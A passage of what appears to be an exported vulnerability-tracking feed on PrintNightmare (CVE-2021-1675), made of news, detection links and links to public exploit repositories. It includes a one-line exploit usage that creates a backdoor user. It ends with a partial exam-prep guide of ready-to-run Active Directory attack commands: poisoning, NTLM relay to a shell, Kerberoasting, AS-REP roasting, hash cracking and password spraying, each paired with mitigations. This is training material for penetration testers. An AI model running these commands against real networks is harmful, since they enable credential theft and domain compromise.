\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438, \u0447\u0442\u043e \u043f\u0430\u0442\u0447, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Microsoft \u0434\u043b\u044f \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-1675, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u0435\u043a\u0442\u043e\u0440 \u0430\u0442\u0430\u043a\u0438 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439. \u041a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0435 \u043f\u0430\u0442\u0447, \u0432\u0441\u0435 \u0435\u0449\u0435 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 Microsoft, \u043f\u043e\u0445\u043e\u0436\u0435, \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u043b\u0430 \u0434\u0432\u0435 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u043f\u043e\u0434 \u043e\u0434\u043d\u0438\u043c \u0438 \u0442\u0435\u043c \u0436\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c CVE.\n\n \n\nhttps://www.securitylab.ru/news/521822.php", "creation_timestamp": "2021-07-01T16:46:39.000000Z"}, {"uuid": "2984438b-cd52-40b0-9fe9-b2c6554d2852", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/SecLabNews/10487", "content": "\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430, \u0447\u0442\u043e \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a PrintNightmare, \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440\u0430 \u043e\u0447\u0435\u0440\u0435\u0434\u0438 \u043f\u0435\u0447\u0430\u0442\u0438 Windows, \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-1675, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0442\u0435\u0445\u043d\u043e\u0433\u0438\u0433\u0430\u043d\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u043c\u0435\u0441\u044f\u0446\u0435, \u2013 \u044d\u0442\u043e \u0434\u0432\u0435 \u0440\u0430\u0437\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u044f\u0432\u0438\u043b\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 PrintNightmare \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n \n\nhttps://www.securitylab.ru/news/521857.php", "creation_timestamp": "2021-07-02T12:15:03.000000Z"}, {"uuid": "7170eada-07bb-44a4-858c-b67dcccbf122", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3750", "content": "#Blue_Team_Techniques\n1. CVE-2021-1675/CVE-2021-34527 Detection Info\nhttps://github.com/LaresLLC/CVE-2021-1675\n]-> Restricting the ACLs:\nhttps://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available\n]-> Mitigation:\nhttps://doublepulsar.com/zero-day-for-every-supported-windows-os-version-in-the-wild-printnightmare-b3fdb82f840c\n\n2. Fail2exploit: a security audit of Fail2ban\nhttps://securitylab.github.com/research/Fail2exploit", "creation_timestamp": "2021-07-03T18:33:01.000000Z"}, {"uuid": "e9988cbd-0f3e-4cd4-b5cf-a42249d0a7dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/3732", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (June 1-30)\nCVE-2021-1675 - Windows Print Spooler EoP\nhttps://t.me/cybersecuritytechnologies/3723\nCVE-2021-21985 - vSphere Client RCE\nhttps://t.me/cybersecuritytechnologies/3493\nCVE-2021-3560 - Privilege escalation with polkit\nhttps://t.me/cybersecuritytechnologies/3587\nCVE-2021-28476 - Hyper-V RCE in vmswitch.sys\nhttps://t.me/cybersecuritytechnologies/3514\nCVE-2020-3580 - XSS in Cisco ASA\nhttps://www.helpnetsecurity.com/2021/06/29/cve-2020-3580-exploit\nCVE-2021-31955/31956 - Windows NTFS EoP/Kernel Information Disclosure\nhttps://github.com/mavillon1/CVE-2021-31955-POC\nhttps://t.me/cybersecuritytechnologies/3705\nCVE-2021-33739 - MS DWM Core Library EoP\nhttps://t.me/cybersecuritytechnologies/3581\nCVE-2021-27850 - Apache Tapestry RCE\nhttps://t.me/cybersecuritytechnologies/3694\nCVE-2020-36289 - Atlassian Jira Unauth User Enum\nhttps://mobile.twitter.com/i/web/status/1402644004781633540", "creation_timestamp": "2021-07-01T11:03:01.000000Z"}, {"uuid": "f7cf42a4-d360-4b8e-ab21-945550a7ed81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/3723", "content": "#exploit\nCVE-2021-35523:\nLPE in Securepoint SSL VPN Client 2.0.3\nhttps://bogner.sh/2021/06/local-privilege-escalation-in-securepoint-ssl-vpn-client-2-0-30\n\nCVE-2021-1675:\n\"PrintNightmare\" - RCE in Windows Spooler Service\nhttps://github.com/afwu/PrintNightmare\n]-> Impacket implementation:\nhttps://github.com/cube0x0/CVE-2021-1675", "creation_timestamp": "2024-02-15T13:46:58.000000Z"}, {"uuid": "470e8569-efc4-4026-a24c-deca20b3a8c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4016", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (July 1-31)\nCVE-2021-1675 - Windows Print Spooler EoP\nhttps://t.me/cybersecuritytechnologies/3723\nCVE-2021-34527 - Windows Print Spooler RCE\nhttps://t.me/cybersecuritytechnologies/3750\nCVE-2021-36934 - Windows SeriousSAM EoP\nhttps://t.me/cybersecuritytechnologies/3891\nCVE-2021-33909 - Sequoia - A LPE Vulnerability in Linux\u2019s Filesystem Layer\nhttps://t.me/cybersecuritytechnologies/3884\nCVE-2021-22555 - Heap out-of-bounds write vuln in Linux Netfilter\nhttps://t.me/cybersecuritytechnologies/3841\nCVE-2021-30807 - OOBR in AppleCLCD/IOMobileFrameBuffer\nhttps://t.me/cybersecuritytechnologies/3930\nCVE-2020-27020 - Vulnerability in Kaspersky Password Manager\nhttps://donjon.ledger.com/kaspersky-password-manager\nCVE-2021-35211 - SolarWinds Serv-U Managed File Transfer Vuln\nhttps://t.me/CyberSecurityTechnologies/4714\nCVE-2021-34481 - Windows Print Spooler EoP\nhttps://mobile.twitter.com/gentilkiwi/status/1416429860566847490\nCVE-2021-3438 - Printer\u2019s Drivers Vulnerability\nhttps://t.me/cybersecuritytechnologies/3969", "creation_timestamp": "2024-01-18T03:22:33.000000Z"}, {"uuid": "f9c95687-547e-4223-8d5d-1461d4953b83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4203", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Aug 1-31)\nCVE-2021-1675 - Print Spooler EoP\nhttps://t.me/cybersecuritytechnologies/3723\nCVE-2021-31956 - Win NTFS EoP\nhttps://t.me/cybersecuritytechnologies/4110\nCVE-2021-36958 - Print Spooler RCE\nhttps://mobile.twitter.com/gentilkiwi/status/1416429860566847490?s=20\nCVE-2021-39137 - A consensus-vuln in go-eth\nCVE-2021-22937 - Pulse ConnSecure RCE\nhttps://t.me/cybersecuritytechnologies/4044\nCVE-2021-34473 - Pre-auth Path Confusion\nhttps://www.zerodayinitiative.com/blog/2021/8/17/from-pwn2own-2021-a-new-attack-surface-on-microsoft-exchange-proxyshell\nCVE-2021-21225 - Vuln in V8's Array.prototype.concat\nhttps://t.me/cybersecuritytechnologies/4090\nCVE-2021-20090 - Path traversal in Buffalo routers\nhttps://t.me/cybersecuritytechnologies/3986\nCVE-2021-26084 - Confluence Server Webwork OGNL Inj\nhttps://t.me/cybersecuritytechnologies/4202\nCVE-2021-3711 - Vulns in OpenSSL\nhttps://nakedsecurity.sophos.com/2021/08/27/big-bad-decryption-bug-in-openssl-but-no-cause-for-alarm", "creation_timestamp": "2021-09-02T11:05:07.000000Z"}, {"uuid": "29459e32-aaa8-45d3-a92b-6452937bc17b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/dc7342/40941", "content": "https://github.com/cube0x0/CVE-2021-1675", "creation_timestamp": "2021-06-30T15:47:13.000000Z"}, {"uuid": "acae1110-2ff3-4429-9d6e-811996aad419", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/LearnExploit/2538", "content": "\u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062c\u062f\u06cc\u062f \u0648 \u062e\u0637\u0631\u0646\u0627\u06a9\u06cc \u0628\u0647 \u0646\u0627\u0645 PrintNightmare \u06a9\u0647 \u0628\u0647 \u0646\u0638\u0631 \u062f\u0631 \u062d\u0627\u0644 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06af\u0633\u062a\u0631\u062f\u0647 \u0646\u06cc\u0632 \u0645\u06cc \u0628\u0627\u0634\u062f . \n\n\u062a\u06cc\u0645 \u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062e\u0637\u0631\u0646\u0627\u06a9 \u0628\u0647 \u0646\u0627\u0645 PrintNightmare \u0631\u0627 \u0631\u0648\u06cc Windows \u06a9\u0634\u0641 \u06a9\u0631\u062f\u0647 \u0627\u0646\u062f \u06a9\u0647 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u062c\u0627\u0632\u0647 \u06a9\u0646\u062a\u0631\u0644 \u062f\u0627\u0645\u06cc\u0646 \u0631\u0627 \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0645\u06cc \u062f\u0647\u062f . \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0646\u0648\u0632 \u062a\u0648\u0633\u0637 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a Patch \u0646\u0634\u062f\u0647 \u0627\u0645\u0627 \u0634\u0631\u06a9\u062a \u0627\u0645\u0646\u06cc\u062a\u06cc \u0686\u06cc\u0646\u06cc QiAnXin \u06cc\u06a9 \u0641\u06cc\u0644\u0645 \u062f\u0645\u0648 \u0627\u0632 Exploit \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0647 \u0648 \u0647\u0645 \u0632\u0645\u0627\u0646 \u06af\u0632\u0627\u0631\u0634 \u0647\u0627\u06cc\u06cc \u0645\u0628\u0646\u06cc \u0628\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06af\u0631\u0648\u0647 \u0647\u0627\u06cc \u0647\u06a9\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a . \n\n\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc ( CVE-2021-1675 ) \u0628\u0633\u06cc\u0627\u0631 \u0628\u062d\u0631\u0627\u0646\u06cc \u0628\u0648\u062f\u0647 \u0648 \u0644\u0627\u0632\u0645 \u0628\u0647 \u0627\u0642\u062f\u0627\u0645 \u0641\u0648\u0631\u06cc Admin \u0647\u0627\u06cc \u0634\u0628\u06a9\u0647 \u062f\u0627\u0631\u062f . \u0627\u0632 \u0622\u0646\u062c\u0627 \u06a9\u0647 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0631\u062a\u0628\u0637 \u0628\u0627 Windows ( Print Spooler ) \u0645\u06cc \u0628\u0627\u0634\u062f \u0644\u0627\u0632\u0645 \u0627\u0633\u062a \u062a\u0627 \u0632\u0645\u0627\u0646 \u0627\u0631\u0627\u0626\u0647 Patch \u0627\u0632 \u0637\u0631\u0641 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a \u0641\u0648\u0631\u0627 \u0633\u0631\u0648\u06cc\u0633 Spooler \u0628\u0647 \u0648\u06cc\u0698\u0647 \u0631\u0648\u06cc Domain Controller \u0647\u0627 \u0645\u062a\u0648\u0642\u0641 \u0648 Disable \u0634\u0648\u062f . \u0633\u0627\u06cc\u0631 \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0631\u0648 \u0645\u06cc\u062a\u0648\u0646\u06cc\u062f \u062f\u0631 \u0627\u06cc\u0646 \u0644\u06cc\u0646\u06a9 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u06cc\u062f . \n\n\u0645\u0648\u0633\u0633\u0647 \u0645\u0639\u062a\u0628\u0631 NIST \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0628\u0627 \u062f\u0631\u062c\u0647 High \u062a\u0627\u06cc\u06cc\u062f \u06a9\u0631\u062f\u0647 . \n\u062c\u0647\u062a \u0627\u06cc\u0646\u06a9\u0647 \u0622\u06cc\u0627 \u0633\u0631\u0648\u06cc\u0633 \u0634\u0645\u0627 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0647\u0633\u062a \u0648 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0634\u062f\u0647 \u06cc\u0627 \u0646\u0647 \u0645\u06cc\u062a\u0648\u0646\u06cc\u062f \u0627\u0632 \u0627\u06cc\u0646 \u0627\u0628\u0632\u0627\u0631 \u06a9\u0647 \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0647\u0633\u062a \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f : \n\nGithub \n\n\u0647\u0645\u0686\u0646\u06cc\u0646 \u0633\u0648\u0631\u0633 \u06a9\u062f \u0627\u06cc\u0646 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0628\u0647 \u0635\u0648\u0631\u062a \u0639\u0645\u0648\u0645\u06cc \u067e\u062e\u0634 \u0634\u062f\u0647 \u0648 \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u0647 :\n\nExploit \n\n#PrintNightmare #0day \n\niliyahr\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2021-07-01T13:32:25.000000Z"}, {"uuid": "1419791f-3f8b-43ee-972a-21fead778ce3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "published-proof-of-concept", "source": "https://t.me/club31337/484", "content": "https://github.com/cube0x0/CVE-2021-1675", "creation_timestamp": "2024-11-09T01:33:49.000000Z"}, {"uuid": "24090742-4b10-47a5-901c-9472f0ae817d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "exploited", "source": "https://t.me/club31337/485", "content": "PrintNightmare (CVE-2021-1675): Remote code execution in Windows Spooler Service.\n\n#RCE #Windows #CVE #privesc\n\nhttps://github.com/afwu/PrintNightmare", "creation_timestamp": "2024-11-09T01:33:49.000000Z"}, {"uuid": "0ddf252c-cc71-4228-baac-05eec5983592", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://t.me/bhhub/516", "content": "#BugBountyTips of the Day\nCVE-2021-1675 - PrintNightmare LPE (PowerShell) - Usage: Import-Module .\\cve-2021-1675.ps1 Invoke-Nightmare -DriverName \"HP\" -NewUser \"0day\" -NewPassword \"LulSpool\"  - Repo:  https://t.co/hb8DhzS0jI - Creators: @calebjstewart @_johnhammond  - #CyberSecurity #CTF #bugbountytips  https://t.co/QVfNPMnRmS\n---\n(ReconSpider - Advanced Open Source Intelligence (OSINT) Framework For Scanning IP Addresses, Emails, Websites, Organizations) -  https://t.co/H45Xz60gep #infosec #netsec #pentest #cybersecurity #bugbounty  https://t.co/3fZtbimJjx\n---\n#BugBounty I just earned $3133.70 on @GoogleVRP; bug: P2 internal googlers development dashboard exposed + arbitrary file read as root, the interesting thing about this it's that  it was outside of Google internal network  #infosec  https://t.co/m2fx9ohV8l\n---\nI just published My Methodology In Recon And Find Bugs & My Methodology In Hunting Using Phone  https://t.co/Skzz8BsFBr   special thanks for @XHackerx007 @waseyuddin @Masonhck3571 @aditi_singghh  @snewbill @Bugcrowd @lot of friends here  #BugBounty #bugbountytip #bugbountytips\n---\nHey Hackers, do you know how to exploit ReDoS or RegExDos? It is serious and yet easily exploitable.  Download from here :  https://t.co/kcFSH2jSxp  #infosec #appsec #security #bugbountytips #bugbounty #Hackers #learn365 #zine #webappsec #cybersecurity  https://t.co/d9zwE8bAAI\n---\nYour Full Map To Github Recon And Leaks Exposure  https://t.co/voUww9AwKL  #bugbountytips\n---\nI'm happy to announce that I have passed 10,000 reputations on @Hacker0x01! #BugBounty  https://t.co/oQBDzDqVhH\n---\nExploiting Grafana!  A mindmap explaining some common bug in grafana and how to exploit it   Repository:  https://t.co/lIj6wucZh0 MindMap:  https://t.co/T2H1cz3bmX  You can use the @pdnuclei tool to check some vulnerabilities in grafana  #bugbountytips #bugbounty #grafana", "creation_timestamp": "2021-08-20T13:37:04.000000Z"}, {"uuid": "0e72704e-a40e-47e3-b43e-2c5cad19a34b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-1675", "type": "seen", "source": "https://gist.github.com/sidsecurity/39dfb2f2fbe3bb3a32ae31fdb22febea", "content": "Comprehensive Guide to Active Directory Attacks for PNPT Exam\nThis guide covers all major Active Directory attacks relevant to the Practical Network Penetration Tester (PNPT) certification exam. The PNPT exam assesses your ability to perform external and internal network penetration tests, with heavy emphasis on AD exploitation, lateral movement, and ultimately compromising the Domain Controller.\n\nTable of Contents\nPre-Compromise Enumeration\n\nLLMNR/NBT-NS Poisoning (Responder)\n\nSMB Relay Attacks\n\nKerberoasting\n\nAS-REP Roasting\n\nPassword Spraying\n\nPass-the-Hash (PtH)\n\nDCSync Attack\n\nACL Abuse & BloodHound\n\nUnconstrained Delegation Attacks\n\nADCS Attacks (Certified Pre-Owned)\n\nPetitPotam & NTLM Relay to ADCS\n\nKerberos Golden/Silver Tickets\n\nZeroLogon (CVE-2020-1472)\n\nPrintNightmare (CVE-2021-1675)\n\nnoPac (CVE-2021-42278/CVE-2021-42287)\n\nAttack 1: Pre-Compromise AD Enumeration\nDescription\nBefore executing any attack, you must enumerate the Active Directory environment. This includes discovering domain controllers, users, groups, and shares without any credentials (null session) or with low-privileged accounts.\n\nTools Used\nenum4linux-ng\n\nldapsearch\n\nrpcclient\n\nnmap\n\nCrackMapExec (now netexec)\n\nCommands\nSMB Null Session Enumeration:\n\nbash\n# Enumerate via SMB\nrpcclient -U \"\" -N 192.168.1.10\n> srvinfo\n> enumdomusers\n> enumdomgroups\n\n# Using enum4linux-ng\nenum4linux-ng -A 192.168.1.10\n\n# Using CrackMapExec\nnetexec smb 192.168.1.10 -u '' -p '' --shares\nLDAP Anonymous Enumeration:\n\nbash\n# Basic LDAP query\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\"\n\n# Dump all users\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\" \"(objectClass=user)\" sAMAccountName userPrincipalName\n\n# Dump all computers\nldapsearch -x -H ldap://192.168.1.10 -b \"DC=corp,DC=local\" \"(objectClass=computer)\" dNSHostName\nDNS Enumeration:\n\nbash\n# Query DC via DNS\nnslookup\n> set type=SRV\n> _ldap._tcp.dc._msdcs.corp.local\n\n# Using adidnsdump\nadidnsdump -u corp.local\\\\jsmith -p Password123 --dns-tcp 192.168.1.10\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 1: enum4linux-ng output showing domain users and groups]\n\nCaption: enum4linux-ng successful enumeration of domain users from null session\nMitigation\nDisable anonymous LDAP binds\n\nRestrict null session access via HKLM\\System\\CurrentControlSet\\Control\\LSA\\RestrictAnonymous\n\nEnable SMB signing\n\nAttack 2: LLMNR/NBT-NS Poisoning (Responder)\nDescription\nWhen a host cannot resolve a name via DNS, it falls back to Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS). Responder listens for these requests and responds, capturing NTLMv2 hashes from the requesting machine.\n\nTools Used\nResponder (Kali Linux)\n\nInveigh (Windows)\n\nCommands\nStart Responder in Analyze Mode (safe enumeration):\n\nbash\nsudo responder -I eth0 -A\nStart Responder in Poisoning Mode:\n\nbash\nsudo responder -I eth0 -wFvP\nConfigure Responder for SMB Relay (disable SMB/HTTP):\nEdit /usr/share/responder/Responder.conf:\n\nini\n[Responder Core]\n; Servers to start\nSMB = Off\nHTTP = Off\nSQL = On\nFTP = On\nbash\nsudo responder -I eth0 -wFvP\nWindows Alternative (Inveigh):\n\npowershell\n# Load and run Inveigh\nImport-Module .\\Inveigh.ps1\nInvoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 2: Responder capturing NTLMv2 hash from a compromised host]\n\nCaption: Responder captures NTLMv2 hash for user 'jsmith' from host 192.168.1.100\nCracking Captured Hashes\nbash\n# Save hash to file (NTLMv2 format)\nhashcat -m 5600 responder_hash.txt /usr/share/wordlists/rockyou.txt -O\nMitigation\nDisable LLMNR and NBT-NS via Group Policy\n\nEnable Network Access Control\n\nRequire SMB signing\n\nAttack 3: SMB Relay Attack\nDescription\nInstead of cracking captured hashes, you can relay them directly to another machine to authenticate. If the target machine has SMB signing disabled, you can execute commands or dump SAM hashes.\n\nPrerequisites\nTarget must have SMB signing disabled\n\nCaptured hash must be from a user with admin privileges on target\n\nCommands\nCheck for SMB Signing Disabled:\n\nbash\nnmap --script=smb2-security-mode.nse -p445 192.168.1.0/24\nStart NTLM Relay (single target):\n\nbash\nntlmrelayx.py -t 192.168.1.20 -smb2support\nRelay to Multiple Targets:\n\nbash\nntlmrelayx.py -tf targets.txt -smb2support\nExecute Command via Relay:\n\nbash\nntlmrelayx.py -t 192.168.1.20 -smb2support -c \"whoami\"\nGenerate Interactive Shell:\n\nbash\n# Start relay with reverse shell\nntlmrelayx.py -t 192.168.1.20 -smb2support -i\n# Then connect to the interactive shell\nnc 127.0.0.1 11000\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 3: ntlmrelayx.py successfully relaying to target and dumping SAM]\n\nCaption: Successful SMB relay attack dumping local SAM hashes from target 192.168.1.20\nMitigation\nEnable SMB signing on all systems\n\nDisable NTLM authentication where possible\n\nImplement SMB over QUIC for modern environments\n\nAttack 4: Kerberoasting\nDescription\nAny authenticated domain user can request a Kerberos Ticket Granting Service (TGS) ticket for any service account with a Service Principal Name (SPN). The TGS is encrypted with the service account's NTLM hash, allowing offline cracking.\n\nTools Used\nGetUserSPNs.py (Impacket)\n\nRubeus.exe (Windows)\n\nPowerView\n\nCommands\nLinux - Extract all SPNs:\n\nbash\npython3 GetUserSPNs.py -dc-ip 192.168.1.10 corp.local/jsmith:Password123 -request\nSave Hashes for Cracking:\n\nbash\npython3 GetUserSPNs.py -dc-ip 192.168.1.10 corp.local/jsmith:Password123 -request -outputfile kerberoast_hashes.txt\nCrack with Hashcat:\n\nbash\n# Mode 13100 = Kerberos 5 TGS-REP (etype 23)\nhashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt -O\nWindows - Using Rubeus:\n\npowershell\n# Request all SPNs\nRubeus.exe kerberoast /outfile:hashes.txt\n\n# Request specific SPN\nRubeus.exe kerberoast /spn:\"MSSQLSvc/sql.corp.local\" /nowrap\nUsing PowerView:\n\npowershell\n# Find all SPNs\nGet-DomainUser -SPN | Select-Object samAccountName, ServicePrincipalName\n\n# Request TGS\nGet-DomainUser -SPN | Request-SPNTicket\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 4: GetUserSPNs.py output with hash for svc_sql account]\n\nCaption: Kerberoasting attack successfully extracts TGS ticket for svc_sql account\nMitigation\nUse long, complex passwords (25+ characters) for service accounts\n\nUse Group Managed Service Accounts (gMSA)\n\nMonitor Event ID 4769 for unusual TGS requests\n\nAttack 5: AS-REP Roasting\nDescription\nAccounts with \"Do not require Kerberos preauthentication\" enabled will respond to authentication requests with an AS-REP message encrypted with the user's password hash. This attack requires NO valid credentials.\n\nCommands\nFind and Roast All Vulnerable Users:\n\nbash\npython3 GetNPUsers.py corp.local/ -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt\nTarget a Specific User:\n\nbash\npython3 GetNPUsers.py corp.local/jsmith -request -format hashcat\nCrack AS-REP Hashes:\n\nbash\n# Mode 18200 = Kerberos 5 AS-REP (etype 23)\nhashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt -O\nWindows - Using Rubeus:\n\npowershell\n# Find users with preauth disabled\nRubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt\nSample Output\ntext\n[SCREENSHOT PLACEHOLDER - Figure 5: GetNPUsers.py successfully retrieving AS-REP hash for user 'svc_backup']\n\nCaption: AS-REP Roasting attack retrieves crackable hash without any authentication\nMitigation\nAudit accounts with preauthentication disabled\n\npowershell\nGet-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth\nEnable preauthentication on all accounts\n\nMonitor Event ID 4768 with error code 0x0\n\nAttack 6: Password Spraying\nDescription\nInstead of brute-forcing one account, password spraying attempts one common password against many accounts. This stays under the lockout threshold.\n\nCommands\nUsing CrackMapExec:\n\nbash\nnetexec smb 192.168.1.10 -u users.txt -p 'Winter2025!' --continue-on-success\nUsing DomainPasswordSpray.ps1:\n\npowershell\nImport-Module 